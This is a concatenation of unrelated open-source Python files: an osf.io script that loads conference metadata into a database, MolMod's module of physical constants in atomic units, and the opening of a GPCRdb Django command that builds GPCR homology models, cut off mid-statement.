'talk': True, }, 'VSSEF2015': { 'name': 'Virginia State Science and Engineering Fair 2015', 'info_url': 'http://www.vmi.edu/conferences/vssef/vssef_home/', 'logo_url': 'http://www.vmi.edu/uploadedImages/Images/Headers/vssef4.jpg', 'location': 'Lexington, VA', 'start_date': 'Mar 27 2015', 'end_date': 'Mar 28 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'RMPA2015': { 'name': 'Rocky Mountain Psychological Association 2015', 'info_url': 'http://www.rockymountainpsych.org/uploads/7/4/2/6/7426961/85th_annual_rmpa_conference_program_hr.pdf', 'logo_url': 'http://www.rockymountainpsych.org/uploads/7/4/2/6/7426961/header_images/1397234084.jpg', 'location': 'Boise, Idaho', 'start_date': 'Apr 09 2015', 'end_date': 'Apr 11 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'ARP2015': { 'name': 'Association for Research in Personality 2015', 'info_url': 'http://www.personality-arp.org/conference/', 'logo_url': 'http://www.personality-arp.org/wp-content/uploads/conference/st-louis-arp.jpg', 'location': 'St. 
Louis, MO', 'start_date': 'Jun 11 2015', 'end_date': 'Jun 13 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'SEP2015': { 'name': 'Society of Experimental Psychologists Meeting 2015', 'info_url': 'http://faculty.virginia.edu/Society_of_Experimental_Psychologists/', 'logo_url': 'http://www.sepsych.org/nav/images/SEP-header.gif', 'location': 'Charlottesville, VA', 'start_date': 'Apr 17 2015', 'end_date': 'Apr 18 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'Reid2015': { 'name': 'L. Starling Reid Undergraduate Psychology Conference 2015', 'info_url': 'http://avillage.web.virginia.edu/Psych/Conference', 'location': 'Charlottesville, VA', 'start_date': 'Apr 17 2015', 'end_date': 'Apr 17 2015', 'logo_url': None, 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'NEEPS2015': { 'name': 'Northeastern Evolutionary Psychology Conference 2015', 'info_url': 'http://neeps2015.weebly.com/', 'location': 'Boston, MA', 'start_date': 'Apr 09 2015', 'end_date': 'Apr 11 2015', 'logo_url': None, 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'VaACS2015': { 'name': 'Virginia Section American Chemical Society Student Poster Session 2015', 'info_url': 'http://virginia.sites.acs.org/', 'logo_url': 'http://virginia.sites.acs.org/Bulletin/15/UVA.jpg', 'location': 'Charlottesville, VA', 'start_date': 'Apr 17 2015', 'end_date': 'Apr 17 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'MADSSCi2015': { 'name': 'Mid-Atlantic Directors and Staff of Scientific Cores & Southeastern Association of Shared Services 2015', 'info_url': 'http://madssci.abrf.org', 'logo_url': 'http://s24.postimg.org/qtc3baefp/2015madssci_seasr.png', 'location': 'Charlottesville, VA', 'start_date': 'Jun 03 2015', 'end_date': 'Jun 5 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'NRAO2015': { 'name': 'National Radio Astronomy Observatory Accretion 2015', 'info_url': 'https://science.nrao.edu/science/meetings/2015/accretion2015/posters', 'location': 'Charlottesville, VA', 'start_date': 'Oct 09 2015', 'end_date': 'Oct 10 2015', 'logo_url': None, 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'ARCS2015': { 'name': 'Advancing Research Communication and Scholarship 2015', 'info_url': 'http://commons.pacificu.edu/arcs/', 'logo_url': 'http://commons.pacificu.edu/assets/md5images/4dfd167454e9f4745360a9550e189323.png', 'location': 'Philadelphia, PA', 'start_date': 'Apr 26 2015', 'end_date': 'Apr 28 2015', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'singlecasedesigns2015': { 'name': 'Single Case Designs in Clinical Psychology: Uniting Research and Practice', 'info_url': 'https://www.royalholloway.ac.uk/psychology/events/eventsarticles/singlecasedesignsinclinicalpsychologyunitingresearchandpractice.aspx', 'logo_url': None, 'location': 'London, UK', 'start_date': 'Apr 17 2015', 'end_date': 'Apr 17 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'OSFM2015': { 'name': 'OSF for Meetings 2015', 'info_url': None, 'logo_url': None, 'location': 'Charlottesville, VA', 'start_date': None, 'end_date': None, 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'JSSP2015': { 'name': 'Japanese Society of Social Psychology 2015', 
'info_url': 'http://www.socialpsychology.jp/conf2015/index.html', 'logo_url': None, 'location': 'Tokyo, Japan', 'start_date': 'Oct 31 2015', 'end_date': 'Nov 01 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, '4S2015': { 'name': 'Society for Social Studies of Science 2015', 'info_url': 'http://www.4sonline.org/meeting', 'logo_url': 'http://www.4sonline.org/ee/denver-skyline.jpg', 'location': 'Denver, CO', 'start_date': 'Nov 11 2015', 'end_date': 'Nov 14 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'IARR2016': { 'name': 'International Association for Relationship Research 2016', 'info_url': 'http://iarr.psych.utoronto.ca/', 'logo_url': None, 'location': 'Toronto, Canada', 'start_date': 'Jul 20 2016', 'end_date': 'Jul 24 2016', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'IA2015': { 'name': 'Inclusive Astronomy 2015', 'info_url': 'https://vanderbilt.irisregistration.com/Home/Site?code=InclusiveAstronomy2015', 'logo_url': 'https://vanderbilt.blob.core.windows.net/images/Inclusive%20Astronomy.jpg', 'location': 'Nashville, TN', 'start_date': 'Jun 17 2015', 'end_date': 'Jun 19 2015', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'R2RC': { 'name': 'Right to Research Coalition', 'info_url': None, 'logo_url': None, 'location': None, 'start_date': None, 'end_date': None, 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'OpenCon2015': { 'name': 'OpenCon2015', 'info_url': 'http://opencon2015.org/', 'logo_url': 'http://s8.postimg.org/w9b30pxyd/Open_Con2015_new_logo.png', 'location': 'Brussels, Belgium', 'start_date': 'Nov 14 2015', 'end_date': 'Nov 16 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'ESIP2015': { 'name': 'Earth Science Information Partners 2015', 'info_url': 'http://esipfed.org/', 'logo_url': 'http://s30.postimg.org/m2uz2g4pt/ESIP.png', 'location': None, 'start_date': None, 'end_date': None, 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'SPSP2016': { 'name': 'Society for Personality and Social Psychology 2016 ', 'info_url': 'http://meeting.spsp.org', 'logo_url': None, 'location': 'San Diego, CA', 'start_date': 'Jan 28 2016', 'end_date': 'Jan 30 2016', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'NACIII': { 'name': '2015 National Astronomy Consortium (NAC) III Workshop', 'info_url': 'https://info.nrao.edu/do/odi/meetings/2015/nac111/', 'logo_url': None, 'location': 'Washington, DC', 'start_date': 'Aug 29 2015', 'end_date': 'Aug 30 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'CDS2015': { 'name': 'Cognitive Development Society 2015', 'info_url': 'http://meetings.cogdevsoc.org/', 'logo_url': None, 'location': 'Columbus, OH', 'start_date': 'Oct 09 2015', 'end_date': 'Oct 10 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'SEASR2016': { 'name': 'Southeastern Association of Shared Resources 2016', 'info_url': 'http://seasr.abrf.org', 'logo_url': None, 'location': 'Atlanta, GA', 'start_date': 'Jun 22 2016', 'end_date': 'Jun 24 2016', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'Accretion2015': { 'name': 'Observational Evidence of Gas Accretion onto Galaxies?', 'info_url': 
'https://science.nrao.edu/science/meetings/2015/accretion2015', 'logo_url': None, 'location':'Charlottesville, VA', 'start_date':'Oct 09 2015', 'end_date':'Oct 10 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, '2020Futures': { 'name': 'U.S. Radio/Millimeter/Submillimeter Science Futures in the 2020s', 'info_url': 'https://science.nrao.edu/science/meetings/2015/2020futures/home', 'logo_url': None, 'location':'Chicago, IL', 'start_date':'Dec 15 2015', 'end_date':'Dec 17 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'RMPA2016': { 'name': 'Rocky Mountain Psychological Association 2016', 'info_url': 'http://www.rockymountainpsych.org/convention-info.html', 'logo_url': 'http://www.rockymountainpsych.org/uploads/7/4/2/6/7426961/header_images/1397234084.jpg', 'location':'Denver, CO', 'start_date':'Apr 14 2016', 'end_date':'Apr 16 2016', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'CNI2015': { 'name': 'Coalition for Networked Information (CNI) Fall Membership Meeting 2015', 'info_url': 'https://wp.me/P1LncT-64s', 'logo_url': None, 'location':'Washington, DC', 'start_date':'Dec 14 2015', 'end_date':'Dec 16 2015', 'active': True, 'admins': [], 'public_projects': True, 'poster': False, 'talk': True, }, 'SWPA2016': { 'name': 'Southwestern Psychological Association Convention 2016', 'info_url': 'https://www.swpsych.org/conv_dates.php', 'logo_url': 'http://s28.postimg.org/xbwyqqvx9/SWPAlogo4.jpg', 'location':'Dallas, TX', 'start_date':'Apr 08 2016', 'end_date':'Apr 10 2016', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'ESIP2016W': { 'name': 'Earth Science Information Partners Winter Meeting 2016', 'info_url': 'http://commons.esipfed.org/2016WinterMeeting', 'logo_url': 'http://s30.postimg.org/m2uz2g4pt/ESIP.png', 'location':'Washington, DC', 'start_date':'Jan 06 2016', 'end_date':'Jan 08 2016', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'MiamiBrainhack15': { 'name': 'University of Miami Brainhack 2015', 'info_url': 'http://brainhack.org/americas/', 'logo_url': None, 'location': None, 'start_date': 'Oct 23 2015', 'end_date': 'Oct 25 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'PsiChiRepository': { 'name': 'Psi Chi', 'location': None, 'start_date': None, 'end_date': None, 'info_url': 'http://www.psichi.org/?ResearchAdvisory#.VmBpeOMrI1g', 'logo_url': 'http://s11.postimg.org/4g2451vcz/Psi_Chi_Logo.png', 'active': True, 'admins': [ 'research.director@psichi.org', ], 'field_names': { 'submission1': 'measures', 'submission2': 'materials', 'submission1_plural': 'measures/scales', 'submission2_plural': 'study materials', 'meeting_title_type': 'Repository', 'add_submission': 'materials', 'mail_subject': 'Title', 'mail_message_body': 'Measure or material short description', 'mail_attachment': 'Your measure/scale or material file(s)' }, }, 'GI2015': { 'name': 'Genome Informatics 2015', 'info_url': 'https://meetings.cshl.edu/meetings.aspx?meet=info&year=15', 'logo_url': None, 'location':'Cold Spring Harbor, NY' , 'start_date': 'Oct 28 2015', 'end_date': 'Oct 31 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'MADSSCi2016': { 'name': 'Mid-Atlantic Directors and Staff of Scientific Cores & Southeastern Association of Shared Services 2016', 'info_url': 'http://madssci.abrf.org', 'logo_url': 
'http://madssci.abrf.org/sites/default/files/madssci-logo-bk.png', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'SMM2015': { 'name': 'The Society for Marine Mammalogy', 'info_url': 'https://www.marinemammalscience.org/conference/', 'logo_url': None, 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'TESS': { 'name': 'Time-sharing Experiments for the Social Sciences', 'info_url': 'http://www.tessexperiments.org', 'logo_url': None, 'active': False, 'admins': [], 'public_projects': True, 'poster': False, 'talk': True, 'field_names': { 'submission1': 'poster', 'submission2': 'study', 'submission1_plural': 'posters', 'submission2_plural': 'studies', 'meeting_title_type': 'Studies', 'add_submission': 'studies', } }, 'ASCERM2016': { 'name': 'ASCE Rocky Mountain Student Conference 2016', 'info_url': 'http://luninuxos.com/asce/', 'logo_url': 'http://s2.postimg.org/eaduh2ovt/2016_ASCE_Rocky_Mtn_banner.png', 'active': True, 'admins': [], 'public_projects': True, 'poster': False, 'talk': True, }, 'ARCA2016': { 'name': '5th Applied Research Conference in Africa', 'info_url': 'http://www.arcaconference.org/', 'logo_url': 'http://www.arcaconference.org/images/ARCA_LOGO_NEW.JPG', 'active': True, 'admins': [], 'public_projects': True, 'poster': False, 'talk': True, }, 'CURCONF2016': { 'name': 'CUR Biennial Conference 2016', 'info_url': 'http://www.cur.org/conferences_and_events/biennial2016/', 'logo_url': 'http://s11.postimg.org/v8feuna4y/Conference_logo_eps.jpg', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'CATALISE2016': { 'name': 'Criteria and Terminology Applied to Language Impairments: Synthesising the Evidence (CATALISE) 2016', 'info_url': None, 'logo_url': None, 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'Emergy2016': { 'name': '9th Biennial Emergy Research Conference', 'info_url': 'http://www.cep.ees.ufl.edu/emergy/conferences/ERC09_2016/index.shtml', 'logo_url': 'http://s12.postimg.org/uf9ioqmct/emergy.jpg', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'aps2016': { 'name': 'Association for Psychological Science 2016', 'info_url': 'http://www.psychologicalscience.org/convention', 'logo_url': 'http://www.psychologicalscience.org/redesign/wp-content/uploads/2015/03/APS_2016_Banner_990x157.jpg', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'jssp2016': { 'name': 'Japanese Society of Social Psychology 2016', 'info_url': 'http://www.socialpsychology.jp/conf2016/', 'logo_url': None, 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'sepech2016': { 'name': 'XI SEPECH - Research Seminar in Human Sciences (Seminário de Pesquisa em Ciências Humanas)', 'info_url': 'http://www.uel.br/eventos/sepech/sepech2016/', 'logo_url': None, 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'etmaal2016': { 'name': 'Etmaal van de Communicatiewetenschap 2016 - Media Psychology', 'info_url': 'https://etmaal2016.wordpress.com', 'logo_url': None, 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'WSAN2016': { 'name': 'WSAN2016 Erasmus University Rotterdam', 'info_url': 'http://www.humane.eu/wsan/', 'logo_url': None, 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'ContainerStrategies': { 'name': 'Container Strategies for 
Data & Software Preservation',
        'info_url': 'https://daspos.crc.nd.edu/index.php/workshops/container-strategies-for-data-software-preservation-that-promote-open-science',
        'logo_url': 'http://s17.postimg.org/8nl1v5mxb/Screen_Shot_2016_03_02_at_9_05_24_PM.png',
        'active': True,
        'admins': [],
        'public_projects': True,
        'poster': True,
    },
    'CNI2016': {
        'name': 'Coalition for Networked Information (CNI) Spring Membership Meeting 2016',
        'info_url': 'https://wp.me/P1LncT-6fd',
        'logo_url': None,
        'active': True,
        'admins': [],
        'public_projects': True,
        'poster': False,
        'talk': True,
    },
    'XGAL2016': {
        'name': 'Molecular Gas in Galactic Environments 2016',
        'info_url': 'https://science.nrao.edu/science/meetings/2016/molecular-gas-in-galactic-environments/home',
        'logo_url': None,
        'active': True,
        'admins': [],
        'public_projects': True,
        'poster': True,
        'talk': True,
    },
    'DLF2016': {
        'name': 'Digital Library Federation 2016 DLF Forum',
        'info_url': 'https://www.diglib.org/forums/2016forum/',
        'logo_url': 'https://www.diglib.org/wp-content/themes/construct/lib/scripts/timthumb/thumb.php?src=https://www.diglib.org/wp-content/uploads/2016/02/DLF-Forum-2016-Slider-Website-1.png&w=580&h=252&zc=1&q=100',
        'active': True,
        'admins': [],
        'public_projects': True,
        'poster': True,
        'talk': True,
        'start_date': 'Nov 7 2016',
        'end_date': 'Nov 9 2016',
        'location': 'Milwaukee, Wisconsin',
    },
    'ESCAN2016': {
        'name': 'European Society for Cognitive and Affective Neuroscience (ESCAN) 2016',
        'info_url': 'http://congressos.abreu.pt/escan2016/',
        'logo_url': 'http://congressos.abreu.pt/escan2016/images/escan-logo.png',
        'active': True,
        'admins': [],
        'public_projects': True,
        'poster': True,
        'talk': True,
    },
    'Reid2016': {
        'name': 'L. Starling Reid Undergraduate Psychology Conference 2016',
        'info_url': 'http://cacsprd.web.virginia.edu/Psych/Conference',
        'logo_url': None,
        'active': True,
        'admins': [],
        'public_projects': True,
        'poster': True,
        'talk': True,
    },
    'CNS2016': {
        'name': 'The Cognitive Neuroscience Society (CNS) 2016',
        'info_url': 'http://www.cogneurosociety.org/annual-meeting/',
        'logo_url': None,
        'active': True,
        'admins': [],
        'public_projects': True,
        'poster': True,
        'talk': True,
    },
    'HEPA2016': {
        'name': 'HEPA Europe Annual Meeting 2016',
        'info_url': 'http://www.hepaeurope2016.eu/',
        'logo_url': None,
        'active': True,
        'admins': [],
        'public_projects': True,
        'poster': True,
        'talk': True,
    },
    'OGH': {
        'name': 'Open Global Health',
        'info_url': None,
        'logo_url': 'http://s33.postimg.org/7tjjpvg4f/Drawing.png',
        'active': True,
        'admins': [],
        'public_projects': True,
        'poster': True,
        'talk': True,
    },
}


def populate_conferences(dev=False):
    if dev:
        Conference.remove()
    date_format = '%b %d %Y'

    for meeting, attrs in MEETING_DATA.iteritems():
        meeting = meeting.strip()
        admin_emails = attrs.pop('admins', [])
        admin_objs = []
        if not dev:
            for email in admin_emails:
                try:
                    user = User.find_one(Q('username', 'iexact', email))
                    admin_objs.append(user)
                except ModularOdmException:
                    raise RuntimeError('Username {0!r} is not registered.'.format(email))
        # Convert string into datetime object
        try:
            attrs['end_date'] = datetime.strptime(attrs.get('end_date'), date_format)
            attrs['start_date'] = datetime.strptime(attrs.get('start_date'), date_format)
        except TypeError:
            print '** Meeting {} does not have a start or end date.
**'.format(meeting) custom_fields = attrs.pop('field_names', {}) conf = Conference( endpoint=meeting, admins=admin_objs, **attrs ) conf.field_names.update(custom_fields) try: conf.save() except ModularOdmException: conf = Conference.find_one(Q('endpoint', 'eq', meeting)) for key, value in attrs.items(): if isinstance(value, dict): current = getattr(conf, key) current.update(value) setattr(conf, key, current) else: setattr(conf, key, value) conf.admins = admin_objs changed_fields = conf.save() if changed_fields: print('Updated {}: {}'.format(meeting, changed_fields)) else: print('Added new Conference: {}'.format(meeting)) if __name__ == '__main__': main()
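
# Illustrative usage (editor's note, not part of the original script): passing
# 'dev' on the command line purges existing Conference records before
# repopulating. The exact module path below is an assumption about the
# repository layout:
#
#   python -m scripts.populate_conferences dev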
zamattiac/osf.io
scripts/populate_conferences.py
Python
apache-2.0
32,271
[ "COLUMBUS" ]
cc9efed33d9390137ddd7895974dedee1c2eed14889d15a7928a8da5807b0e05
# -*- coding: utf-8 -*- # MolMod is a collection of molecular modelling tools for python. # Copyright (C) 2007 - 2019 Toon Verstraelen <Toon.Verstraelen@UGent.be>, Center # for Molecular Modeling (CMM), Ghent University, Ghent, Belgium; all rights # reserved unless otherwise stated. # # This file is part of MolMod. # # MolMod is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 3 # of the License, or (at your option) any later version. # # MolMod is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, see <http://www.gnu.org/licenses/> # # -- """Some useful physicochemical constants in atomic units These are the physical constants defined in this module (in atomic units): """ boltzmann = 3.1668154051341965e-06 avogadro = 6.0221415e23 lightspeed = 137.03599975303575 planck = 6.2831853071795864769 # automatically spice up the docstrings lines = [ " ================ ==================", " Name Value ", " ================ ==================", ] for key, value in sorted(globals().items()): if not isinstance(value, float): continue lines.append(" %16s %.10e" % (key, value)) lines.append(" ================ ==================") __doc__ += "\n".join(lines)
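
# --- Illustrative example (editor's addition, not part of the original
# module). Because every constant above is expressed in atomic units,
# thermal energy at temperature T is simply boltzmann * T (in Hartree):
if __name__ == '__main__':
    room_temperature = 298.15  # Kelvin
    print("kT at %.2f K = %.6e Hartree" % (room_temperature,
                                           boltzmann * room_temperature))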
molmod/molmod
molmod/constants.py
Python
gpl-3.0
1,646
[ "Avogadro" ]
4ec56567745f835a1c6166e9c69ff6e326fd39e7c5d3889ec376e81bcba8621d
from build.management.commands.base_build import Command as BaseBuild from django.db.models import Q from django.conf import settings from protein.models import Protein, ProteinConformation, ProteinAnomaly, ProteinState, ProteinSegment from residue.models import Residue from residue.functions import dgn, ggn from structure.models import * from structure.functions import HSExposureCB, PdbStateIdentifier from common.alignment import AlignedReferenceTemplate, GProteinAlignment from common.definitions import * from common.models import WebLink from signprot.models import SignprotComplex import structure.structural_superposition as sp import structure.assign_generic_numbers_gpcr as as_gn import structure.homology_models_tests as tests import Bio.PDB as PDB from modeller import * from modeller.automodel import * from collections import OrderedDict import os import subprocess import shlex import logging import pprint from io import StringIO import sys import re import zipfile import shutil import math from copy import deepcopy from datetime import datetime, date import yaml import traceback startTime = datetime.now() logger = logging.getLogger('homology_modeling') hdlr = logging.FileHandler('./logs/homology_modeling.log') formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s') hdlr.setFormatter(formatter) logger.addHandler(hdlr) logger.setLevel(logging.INFO) build_date = date.today() import warnings warnings.filterwarnings("ignore") class Command(BaseBuild): help = 'Build automated chimeric GPCR homology models' def add_arguments(self, parser): super(Command, self).add_arguments(parser=parser) parser.add_argument('--update', help='Upload model to GPCRdb, overwrites existing entry', default=False, action='store_true') parser.add_argument('-r', help='''Run program for specific receptor(s) by giving UniProt common name as argument (e.g. 5ht2a_human) or build revised crystal by giving PDB code (e.g. 
4K5Y)''', default=False, type=str, nargs='+') parser.add_argument('-z', help='Create zip file of model directory containing all built models', default=False, action='store_true') parser.add_argument('-c', help='Select GPCR class (A, B1, B2, C, F)', default=False) parser.add_argument('-x', help='Select crystal structure refinement for all crystals in the db', default=False, action='store_true') parser.add_argument('--purge', help='Purge all existing records', default=False, action='store_true') parser.add_argument('-i', help='Number of MODELLER iterations for model building', default=1, type=int) parser.add_argument('--test_run', action='store_true', help='Build only a test set of homology models ', default=False) parser.add_argument('--debug', help='Debugging mode', default=False, action='store_true') parser.add_argument('--state', help='Specify state in debug mode', default=False, type=str, nargs='+') parser.add_argument('--complex', help='Build GPCR complex', default=False, action='store_true') parser.add_argument('--signprot', help='Specify signaling protein with UniProt name', default=False, type=str) parser.add_argument('--n_c_term', help='Model N- and C-termini', default=False, action='store_true') def handle(self, *args, **options): self.debug = options['debug'] if not os.path.exists('./structure/homology_models/'): os.mkdir('./structure/homology_models') if not os.path.exists('./structure/PIR/'): os.mkdir('./structure/PIR') if not os.path.exists('./static/homology_models'): os.mkdir('./static/homology_models') open('./structure/homology_models/done_models.txt','w').close() if options['update']: self.update = True else: self.update = False if options['complex']: self.complex = True else: self.complex = False if not options['signprot']: self.signprot = False else: self.signprot = options['signprot'] GPCR_class_codes = {'A':'001', 'B1':'002', 'B2':'003', 'C':'004', 'F':'005', 'T':'006'} self.modeller_iterations = options['i'] self.build_all = False # Build all if options['purge']: # if updating all, then delete existing print("Delete existing") StructureModel.objects.all().delete() StructureModelSeqSim.objects.all().delete() StructureModelStatsRotamer.objects.all().delete() if options['r']: all_receptors = Protein.objects.filter(entry_name__in=options['r']) elif options['x']: structs = Structure.objects.filter(refined=False, annotated=True).order_by('pdb_code__index') all_receptors = [i.protein_conformation.protein for i in structs] elif options['c']==False: self.build_all = True all_receptors = Protein.objects.filter(parent__isnull=True, accession__isnull=False, species__common_name='Human').filter(Q(family__slug__istartswith='001') | Q(family__slug__istartswith='002') | Q(family__slug__istartswith='003') | Q(family__slug__istartswith='004') | Q(family__slug__istartswith='005') | Q(family__slug__istartswith='006')).order_by('entry_name') structs = Structure.objects.filter(refined=False, annotated=True).order_by('pdb_code__index') all_receptors = list(all_receptors)+[i.protein_conformation.protein for i in structs] elif options['c'].upper() not in GPCR_class_codes: raise AssertionError('Error: Incorrect class name given. 
Use argument -c with class name A, B1, B2, C, F or T') # Build one class else: all_receptors = Protein.objects.filter(parent__isnull=True, accession__isnull=False, species__common_name='Human', family__slug__istartswith=GPCR_class_codes[options['c'].upper()]) self.receptor_list = [] # Find proteins and states for which there is no xtal yet for r in all_receptors: if r.accession==None: self.receptor_list.append([r, Structure.objects.get(pdb_code__index=r.entry_name.upper()).state.name]) continue structs = Structure.objects.filter(protein_conformation__protein__parent=r, refined=False, annotated=True) if r.family.slug.startswith('001') or r.family.slug.startswith('002') or r.family.slug.startswith('003') or r.family.slug.startswith('006'): states_dic = {'Inactive':0, 'Intermediate':0, 'Active':0} if len(structs)==0: self.receptor_list.append([r, 'Inactive']) self.receptor_list.append([r, 'Intermediate']) self.receptor_list.append([r, 'Active']) else: for s in structs: try: del states_dic[s.state.name] except: pass for st in states_dic: self.receptor_list.append([r, st]) elif r.family.slug.startswith('004') or r.family.slug.startswith('005'): states_dic = {'Inactive':0} if len(structs)==0: self.receptor_list.append([r, 'Inactive']) else: for s in structs: try: del states_dic[s.state.name] except: pass for st in states_dic: self.receptor_list.append([r, st]) if self.debug and options['state']: self.receptor_list = [i for i in self.receptor_list if i[1] in options['state']] self.receptor_list_entry_names = [i[0].entry_name for i in self.receptor_list] # Test run, only 5 models if options['test_run']: self.receptor_list = self.receptor_list[:5] self.receptor_list_entry_names = self.receptor_list_entry_names[:5] print("receptors to do",len(self.receptor_list)) self.processors = options['proc'] self.prepare_input(options['proc'], self.receptor_list) missing_models = [] with open('./structure/homology_models/done_models.txt') as f: for i in f.readlines(): if i.split('\n')[0] not in self.receptor_list_entry_names: missing_models.append(i.split('\n')[0]) if len(missing_models)==0: print('All models were run') else: print('Missing models:') print(missing_models) print(input()) # new_args = shlex.split('/env/bin/python3 manage.py build_homology_models -r {} -p {} -s {}'.format(' '.join(missing_models, options['proc'], options['s']))) os.remove('./structure/homology_models/done_models.txt') os.chdir('./structure/') if options['z']==True: zipf = zipfile.ZipFile('../static/homology_models/GPCRdb_homology_models_{}.zip'.format(str(build_date)),'w',zipfile.ZIP_DEFLATED) for root, dirs, files in os.walk('homology_models'): for f in files: if 'post' not in f: zipf.write(os.path.join(root, f)) zipf.close() if not self.debug: shutil.rmtree('homology_models') shutil.rmtree('PIR') def main_func(self, positions, iteration, count, lock): processor_id = round(self.processors*positions[0]/len(self.receptor_list))+1 i = 0 while count.value<len(self.receptor_list): i += 1 with lock: receptor = self.receptor_list[count.value] logger.info('Generating model for \'{}\' ({})... 
({} out of {}) (processor:{} count:{})'.format(receptor[0].entry_name, receptor[1],count.value, len(self.receptor_list),processor_id,i))
                count.value += 1
            # TODO: maybe make this check make sense -- since homology_models are deleted, it doesn't make sense now
            # check
            # sm = StructureModel.objects.filter(protein__entry_name=receptor[0].entry_name, state__name=receptor[1]).first()
            # if sm:
            #     print('receptor',receptor,'already done',sm)
            #     main_structure = sm.main_structure.pdb_code.index
            #     # class_name = 'Class'+class_tree[Protein.objects.get(entry_name=self.reference_entry_name).family.parent.slug[:3]]
            #     # modelname = '{}_{}_{}_{}_GPCRdb'.format(self.class_name, self.reference_entry_name, self.state,
            #     #                                         self.main_structure)
            #     continue
            # then check db
            mod_startTime = datetime.now()
            self.run_HomologyModeling(receptor[0].entry_name, receptor[1])
            logger.info('Model finished for \'{}\' ({})... (processor:{} count:{}) (Time: {})'.format(receptor[0].entry_name, receptor[1],processor_id,i,datetime.now() - mod_startTime))

    def run_HomologyModeling(self, receptor, state):
        try:
            seq_nums_overwrite_cutoff_dict = {'4PHU':2000, '4LDL':1000, '4LDO':1000, '4QKX':1000, '5JQH':1000, '5TZY':2000}
            ##### Ignore output that can come from BioPDB! #####
            if not self.debug:
                _stdout = sys.stdout
                sys.stdout = open(os.devnull, 'w')
            Homology_model = HomologyModeling(receptor, state, [state], iterations=self.modeller_iterations,
                                              complex_model=self.complex, signprot=self.signprot, debug=self.debug)
            alignment = Homology_model.run_alignment([state])
            Homology_model.build_homology_model(alignment)
            formatted_model = Homology_model.format_final_model()
            if Homology_model.changes_on_db!=[]:
                cutoff = seq_nums_overwrite_cutoff_dict[Homology_model.main_structure.pdb_code.index]
                mod_resis = [x.sequence_number for x in Residue.objects.filter(protein_conformation=Homology_model.main_structure.protein_conformation)]
                for r in Homology_model.changes_on_db:
                    if int(str(r)[1:]) in mod_resis:
                        res = Residue.objects.get(protein_conformation=Homology_model.main_structure.protein_conformation,
                                                  sequence_number=int(str(r)[1:]))
                        res.sequence_number = r
                        res.save()
            # Run clash and break test
            p = PDB.PDBParser()
            if Homology_model.revise_xtal==False:
                post_model = p.get_structure('model','./structure/homology_models/{}_{}_{}_{}_GPCRdb.pdb'.format(
                    Homology_model.class_name,Homology_model.reference_entry_name,Homology_model.state,
                    Homology_model.main_structure))
            else:
                post_model = p.get_structure('model','./structure/homology_models/{}_{}_{}_refined_{}_GPCRdb.pdb'.format(
                    Homology_model.class_name, Homology_model.reference_protein.parent.entry_name,
                    Homology_model.main_structure, Homology_model.main_structure.state.name))
            hse = HSExposureCB(post_model, radius=11, check_chain_breaks=True)

            # Check for residue shifts in model
            residue_shift = False
            db_res = ''
            for chain in post_model[0]:
                if self.complex and chain.id=='A':
                    continue
                for res in chain:
                    try:
                        if Homology_model.revise_xtal==False:
                            db_res = Residue.objects.get(protein_conformation__protein=Homology_model.reference_protein,
                                                         sequence_number=int(res.get_id()[1]))
                        else:
